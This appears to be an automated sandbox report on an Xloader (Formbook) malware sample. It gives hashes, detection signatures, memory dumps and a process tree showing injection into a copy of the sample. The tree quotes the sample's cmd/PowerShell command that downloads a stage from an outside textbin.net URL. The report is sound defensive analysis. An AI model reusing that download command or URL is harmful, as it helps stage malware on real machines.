xloader | 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a

General

Target

38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
Size

806KB
MD5

2a552d3676776043ba816a122691e003
SHA1

29f799ce2d6e4268603e5ca310621eda23b92bd7
SHA256

38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a
SHA512

55eb70369368044a654578a703e0856cdc505d2e312dd488216937ca2149f45b785610727713c713b87846f79840e0034cce7aa533fe05a37eb1911a8f331fbf

Score

10^/10

xloader loader rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://textbin.net/raw/a3gbusy118

Signatures

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader

Xloader payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/3484-147-0x0000000000700000-0x000000000072C000-memory.dmp	xloader

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 3584 powershell.exe

flow	pid	process
6	3584	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe

description	pid	process	target process
PID 1636 set thread context of 3484	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3332 3484 WerFault.exe 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe

pid process

3584 powershell.exe
3584 powershell.exe
1636 38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe

pid	pid_target	process	target process
3332	3484	WerFault.exe	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe

pid	process
3584	powershell.exe
3584	powershell.exe
1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exe38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe

description	pid	process
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.execmd.exe

description	pid	process	target process
PID 1636 wrote to memory of 2580	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe	cmd.exe
PID 1636 wrote to memory of 2580	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe	cmd.exe
PID 1636 wrote to memory of 2580	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe	cmd.exe
PID 2580 wrote to memory of 3584	2580	cmd.exe	powershell.exe
PID 2580 wrote to memory of 3584	2580	cmd.exe	powershell.exe
PID 2580 wrote to memory of 3584	2580	cmd.exe	powershell.exe
PID 1636 wrote to memory of 3484	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
PID 1636 wrote to memory of 3484	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
PID 1636 wrote to memory of 3484	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
PID 1636 wrote to memory of 3484	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
PID 1636 wrote to memory of 3484	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
PID 1636 wrote to memory of 3484	1636	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe	38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe

C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
"C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c powershell -Command "(New-Object Net.WebClient).DownloadString('https://textbin.net/raw/a3gbusy118')"
2⤵
- Suspicious use of WriteProcessMemory
PID:2580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadString('https://textbin.net/raw/a3gbusy118')"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe
"C:\Users\Admin\AppData\Local\Temp\38f0565e0b9aca9484c972d69d63803253c014f1a1e90e1b86b9b8e0035b606a.exe"
2⤵
PID:3484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 184
3⤵
- Program crash
PID:3332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3484 -ip 3484
1⤵
PID:2568

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1636-130-0x0000000000D90000-0x0000000000E5E000-memory.dmp

Filesize
824KB

Download
memory/1636-131-0x0000000005D70000-0x0000000006314000-memory.dmp

Filesize
5.6MB

Download
memory/1636-132-0x0000000005650000-0x00000000056E2000-memory.dmp

Filesize
584KB

Download
memory/1636-133-0x00000000056F0000-0x000000000578C000-memory.dmp

Filesize
624KB

Download
memory/1636-144-0x0000000005880000-0x000000000588A000-memory.dmp

Filesize
40KB

Download
memory/2580-134-0x0000000000000000-mapping.dmp

Download
memory/3484-147-0x0000000000700000-0x000000000072C000-memory.dmp

Filesize
176KB

Download
memory/3484-145-0x0000000000000000-mapping.dmp

Download
memory/3584-138-0x00000000052D0000-0x00000000052F2000-memory.dmp

Filesize
136KB

Download
memory/3584-139-0x00000000059C0000-0x0000000005A26000-memory.dmp

Filesize
408KB

Download
memory/3584-140-0x0000000005B60000-0x0000000005BC6000-memory.dmp

Filesize
408KB

Download
memory/3584-141-0x0000000006180000-0x000000000619E000-memory.dmp

Filesize
120KB

Download
memory/3584-143-0x0000000006670000-0x000000000668A000-memory.dmp

Filesize
104KB

Download
memory/3584-142-0x00000000079B0000-0x000000000802A000-memory.dmp

Filesize
6.5MB

Download
memory/3584-137-0x0000000005320000-0x0000000005948000-memory.dmp

Filesize
6.2MB

Download
memory/3584-136-0x0000000002BA0000-0x0000000002BD6000-memory.dmp

Filesize
216KB

Download
memory/3584-135-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads